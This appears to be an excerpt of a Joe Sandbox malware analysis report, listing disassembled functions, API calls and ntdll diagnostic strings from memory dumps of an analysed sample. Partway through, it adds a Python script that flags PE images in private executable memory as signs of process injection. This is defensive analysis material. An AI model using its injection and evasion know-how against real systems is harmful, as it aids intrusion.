• Source File: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_TU0kiz3mxz.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID: &EA
• API String ID: 1279760036-1330915590
• Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
• Instruction ID: 65e1271fa0e6f293e5ca7d904ec396d69fb6d51de338ced040ab1bfa87458b74
• Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
• Instruction Fuzzy Hash: 1DE012B2200208ABDB14EF99DC41EA777ADAF88668F118559BA085B242C630F9118AB0

Control-flow Graph (graph image not reproduced): basic blocks 4082d4-408392; calls 40ace0, 414e40, 41b860, 41b710, 40a470 and PostThreadMessageW
APIs
• PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
Memory Dump Source
• Source File: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_TU0kiz3mxz.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID:
• API String ID: 1836367815-0
• Opcode ID: 0c5670ac6251c0a60da8687f5d77d26f275b51540f007e75c674e4efe23d972f
• Instruction ID: 19c01656c3898c69e84ee8908718035e3049677ab4d7dde92baba569fadc05e3
• Opcode Fuzzy Hash: 0c5670ac6251c0a60da8687f5d77d26f275b51540f007e75c674e4efe23d972f
• Instruction Fuzzy Hash: 50012D3164031C77E711B5615C02FEE7358AB84B54F09017EFE44FB2C1DAB96D0642E9

Control-flow Graph (graph image not reproduced): basic blocks 40830c-408392; calls 41be20, 41c9c0, 414e40, 40ace0, 40a470 and PostThreadMessageW
APIs
• PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
Memory Dump Source
• Source File: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_TU0kiz3mxz.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID:
• API String ID: 1836367815-0
• Opcode ID: 19c66865f75542f675f54a46dd6cd54def56d3851c5970707138c9339e0e24a1
• Instruction ID: 8733b47f60013285a8807cb7a5d81815fd96b1e7676cb7f4731c5b02c55d18d7
• Opcode Fuzzy Hash: 19c66865f75542f675f54a46dd6cd54def56d3851c5970707138c9339e0e24a1
• Instruction Fuzzy Hash: 7601D871A803187AE720A6918C03FFE6B1C9B41B55F05016EFF04FA1C1D6A9290647E9

Control-flow Graph (graph image not reproduced): basic blocks 408310-408392; calls 41c9c0, 41be20, 414e40, 40ace0, 40a470 and PostThreadMessageW
APIs
• PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
Memory Dump Source
• Source File: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_TU0kiz3mxz.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID:
• API String ID: 1836367815-0
• Opcode ID: 6793861beeebbadff428f1e0055fcae04fb265a346085d9c044c4ec0df2940a0
• Instruction ID: a0f03ca10d03d1d5c38d3c187be8154ddc7636efa3ebbcfd239e67dddfad06e3
• Opcode Fuzzy Hash: 6793861beeebbadff428f1e0055fcae04fb265a346085d9c044c4ec0df2940a0
• Instruction Fuzzy Hash: B4018471A8032877E720A6959C43FFE776C6B40B54F05012AFF04BA1C1E6A8690546EA

Control-flow Graph (graph image not reproduced): entry block 408393-408394, continuing at 40832e-408392; calls 41c9c0, 414e40, 40ace0, 40a470 and PostThreadMessageW
APIs
• PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
Memory Dump Source
• Source File: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_TU0kiz3mxz.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID:
• API String ID: 1836367815-0
• Opcode ID: 8c991781031f8c6d473ebbd6a23dc71827103370b9fd2e7a6c452dfc9f5126f3
• Instruction ID: 3e3665392b07dc50b903ca1482a20c39a0d8d9c50d14a314250b7dbfb1e47f4d
• Opcode Fuzzy Hash: 8c991781031f8c6d473ebbd6a23dc71827103370b9fd2e7a6c452dfc9f5126f3
• Instruction Fuzzy Hash: 2DF02271A8032877E7206A544C02FFF27185B81F14F09016EFE84FA1C1DABE690202EA

Control-flow Graph (graph image not reproduced): basic blocks 41a781-41a7c4; calls 41af20 and LookupPrivilegeValueW
APIs
• LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7C0
Memory Dump Source
• Source File: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_TU0kiz3mxz.jbxd
Yara matches
Similarity
• API ID: LookupPrivilegeValue
• String ID:
• API String ID: 3899507212-0
• Opcode ID: 6f60b12bae23740ddff04b9b2a435f9d619a484c6c9bb8091acf3cd8a9da8c8a
• Instruction ID: f7a5976cd5a0d784b45962738d5861c56f65e69eb5b5f090e7fa20213427d3ba
• Opcode Fuzzy Hash: 6f60b12bae23740ddff04b9b2a435f9d619a484c6c9bb8091acf3cd8a9da8c8a
• Instruction Fuzzy Hash: 10F0EDB2200204ABDB24DF55DC85EE733A9EF89318F1080AEF90D6B241CA35E805CBB0

Control-flow Graph (graph image not reproduced): single basic block 41a630-41a661; calls 41af20 and RtlFreeHeap
APIs
• RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A65D
Memory Dump Source
• Source File: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_TU0kiz3mxz.jbxd
Yara matches
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
• Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
• Instruction ID: a31e03847b69acb9206512889bce5d114748d47cfafea9ced6338f279cce3475
• Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
• Instruction Fuzzy Hash: 64E04FB12002046BD714DF59DC45EE777ADEF88754F014559FD0857241C630F910CAF0

Control-flow Graph (graph image not reproduced): basic blocks 41a790-41a7c4; calls 41af20 and LookupPrivilegeValueW
APIs
• LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7C0
Memory Dump Source
• Source File: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_TU0kiz3mxz.jbxd
Yara matches
Similarity
• API ID: LookupPrivilegeValue
• String ID:
• API String ID: 3899507212-0
• Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
• Instruction ID: b8658252b81b08ed33e4a874e4d8f80b0614426e32f2ee3a7d9107b08e04f012
• Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
• Instruction Fuzzy Hash: 9EE01AB12002086BDB10DF49DC85EE737ADAF88654F018155BA0857241C934E8118BF5
APIs
• ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A698
Memory Dump Source
• Source File: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_TU0kiz3mxz.jbxd
Yara matches
Similarity
• API ID: ExitProcess
• String ID:
• API String ID: 621844428-0
• Opcode ID: 9379220829e3c419878ff4888d194fe66dd23624891254af377271388a777a72
• Instruction ID: fd19ce839db182b36b6e96dd962a584e924bd8999524a3a1af9ee6c2b89418f0
• Opcode Fuzzy Hash: 9379220829e3c419878ff4888d194fe66dd23624891254af377271388a777a72
• Instruction Fuzzy Hash: ECE08C716012047BC320DFA8CC85FC73BA99F48754F11846AF96D6B241C530EA008BE1
APIs
• ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A698
Memory Dump Source
• Source File: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_TU0kiz3mxz.jbxd
Yara matches
Similarity
• API ID: ExitProcess
• String ID:
• API String ID: 621844428-0
• Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
• Instruction ID: 94fb8da58e6992106aa2b0ab061ea4c6965e877b66759b154152d16d38dd5c99
• Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
• Instruction Fuzzy Hash: B9D017726002187BD620EB99DC85FD777ACDF487A4F0180AABA1C6B242C531FA108AE1
APIs
Memory Dump Source
• Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 34271d13c2c1128d0679c8ec2b9e1848096a999c70827aa7eba769305cb73600
• Instruction ID: 667783eb17faf009446a6db66f3c8b2c6db4a6e8c89cde7a9fb29c8e752d30ae
• Opcode Fuzzy Hash: 34271d13c2c1128d0679c8ec2b9e1848096a999c70827aa7eba769305cb73600
• Instruction Fuzzy Hash: 7BB09B72D415C5C6DA16E764570C717790077D1701F25C075D2030685F8778C1D1E275
Strings
• *** A stack buffer overrun occurred in %ws:%s, xrefs: 01178DA3
• This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01178F26
• The instruction at %p tried to %s , xrefs: 01178F66
• The critical section is owned by thread %p., xrefs: 01178E69
• The resource is owned shared by %d threads, xrefs: 01178E2E
• *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01178FEF
• This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01178F2D
• <unknown>, xrefs: 01178D2E, 01178D81, 01178E00, 01178E49, 01178EC7, 01178F3E
• read from, xrefs: 01178F5D, 01178F62
• This failed because of error %Ix., xrefs: 01178EF6
• an invalid address, %p, xrefs: 01178F7F
• *** Critical Section Timeout (%p) in %ws:%s, xrefs: 01178E4B
• *** Inpage error in %ws:%s, xrefs: 01178EC8
• *** enter .cxr %p for the context, xrefs: 01178FBD
• The instruction at %p referenced memory at %p., xrefs: 01178EE2
• write to, xrefs: 01178F56
• This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01178F34
• The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01178E86
• *** Resource timeout (%p) in %ws:%s, xrefs: 01178E02
• If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01178DC4
                                                                                                                      • The resource is owned exclusively by thread %p, xrefs: 01178E24
                                                                                                                      • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01178E3F
                                                                                                                      • *** An Access Violation occurred in %ws:%s, xrefs: 01178F3F
                                                                                                                      • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01178DB5
                                                                                                                      • a NULL pointer, xrefs: 01178F90
                                                                                                                      • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01178D8C
                                                                                                                      • *** enter .exr %p for the exception record, xrefs: 01178FA1
                                                                                                                      • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01178DD3
                                                                                                                      • *** then kb to get the faulting stack, xrefs: 01178FCC
                                                                                                                      • Go determine why that thread has not released the critical section., xrefs: 01178E75
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                                                      • API String ID: 0-108210295
                                                                                                                      • Opcode ID: 7e714f7635efd3b1325f3b78597071bcfb961652dd14c2e8f19f89afdf17b6bb
                                                                                                                      • Instruction ID: e73718836fe4afcd2c349f782018b60d690a9e2c6e36126d81b7a5bb78b1292e
                                                                                                                      • Opcode Fuzzy Hash: 7e714f7635efd3b1325f3b78597071bcfb961652dd14c2e8f19f89afdf17b6bb
                                                                                                                      • Instruction Fuzzy Hash: 9B81E479B40215BFDB2EAA19DC89DAB3F35EF56B54F010048F248AF352E7718912C762
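The "Memory Dump Source" lines above all point at the same region: a committed, private, read/write/execute mapping at 01090000 in process 3 that the sandbox found to be "based on PE", and whose strings are ntdll's own loader, heap and verifier diagnostics. A PE image living in private RWX memory rather than in a MEM_IMAGE mapping is what process hollowing and manual mapping leave behind, so that combination is worth checking mechanically. The following is an added example (not Joe Sandbox code and not part of the report) that decodes such lines and flags them. It assumes the .sdmp file name is laid out as process-index.dump-index.stamp.base.protect.state.type.extra, with protect/state/type being the VirtualQuery (MEMORY_BASIC_INFORMATION) values; the page only confirms that the base field equals the printed Offset, the rest of that layout is an assumption. The second input line is constructed for contrast.

```python
"""Decode Joe Sandbox "Memory Dump Source" lines and flag regions that look
like injected or manually mapped images.

Assumption (not stated on the report page): the .sdmp name is
<proc>.<dump>.<stamp>.<base>.<protect>.<state>.<type>.<extra>.sdmp with
protect/state/type taken from MEMORY_BASIC_INFORMATION. Only the base
field is confirmed by the page (it matches the printed "Offset:").
"""
import re
from dataclasses import dataclass
from typing import List, Tuple

# Constants from winnt.h
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80
MEM_COMMIT = 0x1000
MEM_PRIVATE = 0x20000
MEM_MAPPED = 0x40000
MEM_IMAGE = 0x1000000

# Line copied from the report above.
REPORT_LINE = ("Source File: 00000003.00000002.1763936313.0000000001090000."
               "00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, "
               "based on PE: true")
# Constructed line for contrast: a normally loaded module (MEM_IMAGE, RX).
BENIGN_LINE = ("Source File: 00000003.00000002.1763936314.0000000077000000."
               "00000020.00001000.01000000.00000000.sdmp, Offset: 77000000, "
               "based on PE: true")

_SDMP_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<dump>[0-9A-Fa-f]{8})\.(?P<stamp>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\."
    r"(?P<state>[0-9A-Fa-f]{8})\.(?P<type>[0-9A-Fa-f]{8})\."
    r"(?P<extra>[0-9A-Fa-f]{8})\.sdmp$")

_SOURCE_RE = re.compile(
    r"Source File:\s*(?P<name>\S+\.sdmp),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)", re.IGNORECASE)


@dataclass
class DumpRegion:
    name: str
    process_index: int
    dump_index: int
    base: int
    protect: int
    state: int
    mem_type: int
    based_on_pe: bool


def parse_sdmp_name(name: str, based_on_pe: bool) -> DumpRegion:
    """Split the assumed .sdmp name layout into numeric fields."""
    m = _SDMP_RE.match(name)
    if not m:
        raise ValueError(f"not a recognised .sdmp name: {name}")
    return DumpRegion(name=name,
                      process_index=int(m["proc"], 16),
                      dump_index=int(m["dump"], 16),
                      base=int(m["base"], 16),
                      protect=int(m["protect"], 16),
                      state=int(m["state"], 16),
                      mem_type=int(m["type"], 16),
                      based_on_pe=based_on_pe)


def parse_source_line(line: str) -> DumpRegion:
    """Parse one report line and cross-check the printed Offset against the name."""
    m = _SOURCE_RE.search(line)
    if not m:
        raise ValueError(f"not a Memory Dump Source line: {line!r}")
    region = parse_sdmp_name(m["name"], m["pe"].lower() == "true")
    offset = int(m["offset"], 16)
    if offset != region.base:
        raise ValueError(f"Offset {offset:#x} disagrees with name base {region.base:#x}")
    return region


def triage_region(r: DumpRegion) -> Tuple[bool, List[str]]:
    """Return (suspicious, reasons).

    Low byte of protect is the page protection; higher bits (PAGE_GUARD etc.)
    are masked off. A PE that is writable+executable, or that sits outside a
    MEM_IMAGE mapping, was not loaded by the normal image loader."""
    reasons: List[str] = []
    if (r.protect & 0xFF) in (PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY):
        reasons.append("writable and executable protection")
    if r.mem_type == MEM_PRIVATE:
        reasons.append("MEM_PRIVATE (not backed by a mapped file)")
    if r.based_on_pe and r.mem_type != MEM_IMAGE:
        reasons.append("PE header found outside a MEM_IMAGE mapping")
    suspicious = r.based_on_pe and r.state == MEM_COMMIT and bool(reasons)
    return suspicious, reasons


def triage_report(lines: List[str]) -> List[Tuple[str, bool, List[str]]]:
    """Run triage over report text, ignoring lines that are not dump sources."""
    out = []
    for line in lines:
        if "Source File:" not in line:
            continue
        region = parse_source_line(line)
        suspicious, reasons = triage_region(region)
        out.append((region.name, suspicious, reasons))
    return out


if __name__ == "__main__":
    for name, bad, why in triage_report([REPORT_LINE, "Joe Sandbox IDA Plugin", BENIGN_LINE]):
        print(("SUSPICIOUS " if bad else "ok         ") + name, "; ".join(why))
```

The verdict is deliberately conservative: it only fires when the sandbox itself found a PE header in the region, so the stale-but-executable heap chunks that packers leave around do not trip it, while a mapped copy of ntdll in private RWX memory, which is exactly what the strings above suggest, does.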
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-2160512332
                                                                                                                      • Opcode ID: f46e99cf4fdf0eb45a3bb949723dfab489fe2a0faeedccf5df6fc5c066d87870
                                                                                                                      • Instruction ID: 72d9557832db58db8c063178876e12c19de97fd84b5f83d3155cb4c81a1a36cd
                                                                                                                      • Opcode Fuzzy Hash: f46e99cf4fdf0eb45a3bb949723dfab489fe2a0faeedccf5df6fc5c066d87870
                                                                                                                      • Instruction Fuzzy Hash: 17928E71604742AFE729DF19D880FABB7E8BB84B54F04492DFA94D7250D770E884CB92
                                                                                                                      Strings
                                                                                                                      • Address of the debug info found in the active list., xrefs: 011354AE, 011354FA
                                                                                                                      • Critical section address., xrefs: 01135502
                                                                                                                      • double initialized or corrupted critical section, xrefs: 01135508
                                                                                                                      • corrupted critical section, xrefs: 011354C2
                                                                                                                      • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0113540A, 01135496, 01135519
                                                                                                                      • undeleted critical section in freed memory, xrefs: 0113542B
                                                                                                                      • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011354CE
                                                                                                                      • Critical section address, xrefs: 01135425, 011354BC, 01135534
                                                                                                                      • Thread identifier, xrefs: 0113553A
                                                                                                                      • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011354E2
                                                                                                                      • 8, xrefs: 011352E3
                                                                                                                      • Thread is in a state in which it cannot own a critical section, xrefs: 01135543
                                                                                                                      • Critical section debug info address, xrefs: 0113541F, 0113552E
                                                                                                                      • Invalid debug info address of this critical section, xrefs: 011354B6
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                      • API String ID: 0-2368682639
                                                                                                                      • Opcode ID: 3704cc0e0f053906e1c6310aacda72b423739f73d2cc0a74b32c0a8a098664da
                                                                                                                      • Instruction ID: 62c780c157bc2cef7bcd422742a23cd9fac389810e31fe87a28dc7282ad97876
                                                                                                                      • Opcode Fuzzy Hash: 3704cc0e0f053906e1c6310aacda72b423739f73d2cc0a74b32c0a8a098664da
                                                                                                                      • Instruction Fuzzy Hash: 58819EB1A40349EFDB68CF99C845BEEBBB6BB48B14F50811AF544BB680D375A940CB50
                                                                                                                      Strings
                                                                                                                      • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 011324C0
                                                                                                                      • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01132602
                                                                                                                      • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01132498
                                                                                                                      • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 011325EB
                                                                                                                      • RtlpResolveAssemblyStorageMapEntry, xrefs: 0113261F
                                                                                                                      • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01132506
                                                                                                                      • @, xrefs: 0113259B
                                                                                                                      • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 011322E4
                                                                                                                      • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01132409
                                                                                                                      • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01132624
                                                                                                                      • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01132412
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                      • API String ID: 0-4009184096
                                                                                                                      • Opcode ID: e47a2acc3578bd04b982fec5c10c3440b375a937bfd3acdd094cfb11aa024038
                                                                                                                      • Instruction ID: 9e3c4d930c0cbc607cb50ece130f3309cebea4ca5aa2bf45f229dd87b93b8807
                                                                                                                      • Opcode Fuzzy Hash: e47a2acc3578bd04b982fec5c10c3440b375a937bfd3acdd094cfb11aa024038
                                                                                                                      • Instruction Fuzzy Hash: 85027EF1D002299BDB25DB54CC81BDEB7B8AF44704F4041EAE749A7241EB70AE84CF99
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                      • API String ID: 0-2515994595
                                                                                                                      • Opcode ID: a4687c0f75ef6c8f467e1b9b4600ea16e736d6cce6b8afbeadf196d828a24795
                                                                                                                      • Instruction ID: 85e1424fc571a3fbf4b00e5df0cd0a9d7d61af5d3f339bdd0a73e5aa3d1d5929
                                                                                                                      • Opcode Fuzzy Hash: a4687c0f75ef6c8f467e1b9b4600ea16e736d6cce6b8afbeadf196d828a24795
                                                                                                                      • Instruction Fuzzy Hash: EC51EF715143019BC72DDF18C844BABBBECFFA8244F14491DEA98C7284E7B1D618CBA2
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                                                      • API String ID: 0-3197712848
                                                                                                                      • Opcode ID: b6682b0e8f697b1dbbc43fee5ffc59b1dbebee32e0830eb57bd0ede196cd3c04
                                                                                                                      • Instruction ID: a7326e8ed4bc7e8ce260e056f6f8fca30573d9742027c93f072da23606741bf5
                                                                                                                      • Opcode Fuzzy Hash: b6682b0e8f697b1dbbc43fee5ffc59b1dbebee32e0830eb57bd0ede196cd3c04
                                                                                                                      • Instruction Fuzzy Hash: D112F371A08352CFD729DF28C480BAABBE4BF95704F0549ADF9C58B291E734D944CB92
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                      • API String ID: 0-1700792311
                                                                                                                      • Opcode ID: 913e91e08bd327354fb8c64b9d080e45a18862b6335b94b7e6402fffdc64b029
                                                                                                                      • Instruction ID: ffc2855d4cdd807b773d4aaf49c85acf61b3be01ff40185fd86a117b11f2db48
                                                                                                                      • Opcode Fuzzy Hash: 913e91e08bd327354fb8c64b9d080e45a18862b6335b94b7e6402fffdc64b029
                                                                                                                      • Instruction Fuzzy Hash: C6D1EC31600786EFDB2ADF69C490AA9BBF1FF4A704F188059F4869B752C734E980CB14
